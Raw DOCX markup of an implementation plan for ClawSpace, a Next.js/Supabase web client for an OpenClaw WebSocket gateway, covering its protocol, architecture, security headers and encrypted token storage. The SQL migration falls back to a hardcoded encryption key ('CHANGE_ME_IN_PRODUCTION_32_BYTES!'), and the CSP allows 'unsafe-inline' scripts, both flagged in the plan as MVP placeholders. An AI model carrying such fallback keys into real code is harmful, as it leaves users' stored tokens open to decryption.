              <w:t xml:space="preserve">params.auth.token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JSON-RPC:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{method, params}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Framed:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{type:"req", id:"...", method:"...", params:{...}}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{result}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Response:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{type:"res", id:"...", ok:true, payload:{...}}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events:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{type:"chat", event:"text"}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events:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{type:"event", event:"chat", payload:{state:"delta", ...}}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is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chat.send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with token in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handshake: challenge → connect request → hello-ok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device identity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identity required unless</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowInsecureAuth</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">is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Browser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┌──────────────┐  ┌────────────────────────┐ │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ Supabase │  │   Zustand    │  │   GatewayClient        │ │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ Client   │  │   Stores     │  │   (WebSocket)          │ │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ (auth,db)│  │ (UI state)   │  │                        │ │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  └────┬─────┘  └──────┬───────┘  └───────────┬────────────┘ │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │               │                       │              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │         ┌─────┴─────┐           ┌─────┴──────┐      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │         │  React    │           │  OpenClaw   │      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │         │  Components│←─events──│  Gateway    │      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │         └───────────┘           │  (WS)      │      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       │                                 └────────────┘      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└───────┼──────────────────────────────────────────────────────┘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│Supabase │  (auth, database, storage)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   │ Cloud   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   └─────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Data Flow:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. User authenticates with Supabase (email/password)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Gateway connection details stored in Supabase (per user)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Browser opens WebSocket directly to user’s Gateway</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Chat messages sent via WS, responses streamed back</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Messages persisted to Supabase for fast reload + offline access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="41" w:name="phase-0-project-scaffolding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 0: Project Scaffolding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~1.5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: None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CSP headers, security headers, strict TypeScript,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gitignore verification</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="step-0.1-create-next.js-app"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.1: Create Next.js App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create-next-app@latest clawspace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--typescript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--tailwind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--src-dir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--import-alias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--use-npm</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="step-0.2-initialize-shadcnui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.2: Initialize shadcn/ui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clawspace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init</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Choose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Style: Default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Base color: Slate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CSS variables: Yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then add the components we’ll need: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button input label card dialog dropdown-menu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separator scroll-area tooltip badge avatar sheet tabs textarea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alert skeleton popover command sonner resizable switch select</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="step-0.3-install-dependencies"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.3: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zustand @supabase/supabase-js @supabase/ssr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react-markdown remark-gfm rehype-highlight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rehype-sanitize hast-util-sanitize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lucide-react nanoid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dev dependencies: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</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="Xe5dfb0a89a1b986a5affc8ebe53fa3344b4e893"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.4: Configure TypeScript Strict Mode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, ensure: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"noUncheckedIndexedAccess"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"forceConsistentCasingInFileNames"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step-0.5-security-headers-next.config.ts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.5: Security Headers (next.config.ts)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These headers are set BEFORE any feature code is written. They are the outer perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">next.config.ts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'standalone'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'/(.*)'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Prevent clickjacking — ClawSpace should never be iframed by third parties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Prevent MIME-type sniffing (stops browsers from executing uploaded files as scripts)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Prevent token leakage via Referer header (critical for quick-connect URLs)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        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'Referrer-Policy'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Restrict browser features we don't need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'Permissions-Policy'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'camera=(), microphone=(), geolocation=(), payment=()'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CSP — defense-in-depth against XSS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Next.js requires 'unsafe-eval' in dev; strip it for production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"default-src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Scripts: self + nonce-based (Next.js will inject nonces)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"script-src 'self' 'unsafe-inline'"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migrate to nonce-based CSP after MVP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Styles: self + inline (Tailwind + shadcn use inline styles)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"style-src 'self' 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Connect: self + Supabase + any gateway WS (user-configured)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`connect-src 'self'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wss: ws:`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Images: self + Supabase storage + data URIs (base64 images from AI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`img-src 'self'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data: blob:`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Frames: only self (for artifact preview iframes using srcdoc)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"frame-src 'self' blob:"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Fonts: self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"font-src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Block all object/embed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"object-src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Block form submissions to third parties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"form-action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Prevent framing by third parties (CSP version of X-Frame-Options)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"frame-ancestors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Upgrade insecure requests when on HTTPS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"upgrade-insecure-requests"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HSTS — force HTTPS for 1 year (only effective over HTTPS)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'Strict-Transport-Security'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'max-age=31536000; includeSubDomains'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The CSP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wss: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ws:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">broadly because gateway URLs are user-configured. This is intentional — the user chooses their own gateway. We compensate by never sending credentials via URL params and by validating the gateway URL format before connecting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="step-0.6-verify-.gitignore"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.6: Verify .gitignore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Verify this immediately after scaffolding. A committed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is a critical exposure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="step-0.7-set-up-tailwind-dark-mode"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.7: Set Up Tailwind Dark Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tailwind v4 uses CSS-first configuration. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/globals.css</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ensure dark mode support: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@custom-variant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dark 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&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">where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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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dark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> *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</w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="step-0.8-create-project-file-structure"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 0.8: Create Project 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├── page.tsx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│   ├── login/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── signup/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── (app)/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├── project/[id]/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── settings/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── connect/page.tsx       ← Connection health/troubleshooter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auth/callback/route.ts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    ← shadcn components (auto-generated)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── providers.tsx               ← Theme + query providers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── sidebar/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── sidebar.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── project-list.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── connection-status.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── chat/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── message-list.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── message-bubble.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── message-input.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── tool-call-card.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── thinking-indicator.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── streaming-text.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── artifacts/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       ├── artifact-panel.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       ├── html-preview.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       ├── markdown-preview.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       ├── code-preview.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       └── image-preview.tsx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supabase/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├── server.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── middleware.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── gateway/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── client.ts              ← The WebSocket client (CORE)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── types.ts               ← Protocol types</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── device-identity.ts     ← WebCrypto device keypair</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── hooks.ts               ← useGateway, useChat hooks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── artifacts/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── detector.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── utils.ts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│   ├── gateway-store.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── chat-store.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── project-store.ts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index.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create placeholder files for each.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phase-1-authentication-database"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1: Authentication &amp; Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~4 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 0 complete, Supabase project created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Encrypted token storage, RLS on every table, auth hardening, password policy</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="42" w:name="step-1.1-database-schema-migration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.1: Database Schema Migration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supabase/migrations/001_initial.sql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Enable pgcrypto for gateway token encryption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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Encryption key stored as a Supabase Vault secret (or DB-level config).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- In production, use Supabase Vault. For MVP, use a server-side env var</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- passed to the encryption functions via a Postgres function.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- The key below is a PLACEHOLDER — replace with a real 32-byte hex key.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- DO NOT hardcode in migration files for production.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Connection settings per user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gateway_connections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gateway_url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Token stored as encrypted bytea, NOT plaintext.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Encrypted using pgp_sym_encrypt with a server-side key.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The anon/public role can read the row but NOT decrypt without the key.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  gateway_token_encrypted bytea,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Server-side functions for token encrypt/decrypt.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- These run with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DEFINER so the encryption key is never</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- exposed to the client. The key is read from a Supabase secret or</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- environment variable.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- For MVP: store the encryption key in a Supabase Vault secret named</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 'gateway_token_key', or fall back to a hardcoded dev key.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Production MUST use Vault.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encrypt_gateway_token(plain_token text)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">returns bytea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Use current_setting to read a server-side variable, with fallback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pgp_sym_encrypt(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    plain_token,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current_setting(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'app.gateway_token_key'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'CHANGE_ME_IN_PRODUCTION_32_BYTES!'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decrypt_gateway_token(encrypted_token bytea)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">returns text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pgp_sym_decrypt(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    encrypted_token,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current_setting(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'app.gateway_token_key'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'CHANGE_ME_IN_PRODUCTION_32_BYTES!'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Helper to save a connection (encrypts token server-side)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save_gateway_connection(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  p_name text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  p_gateway_url text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  p_gateway_token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uuid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v_id uuid;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gateway_connections (user_id, name, gateway_url, gateway_token_encrypted)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p_name,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    p_gateway_url,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p_gateway_token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encrypt_gateway_token(p_gateway_token)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(user_id, name)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
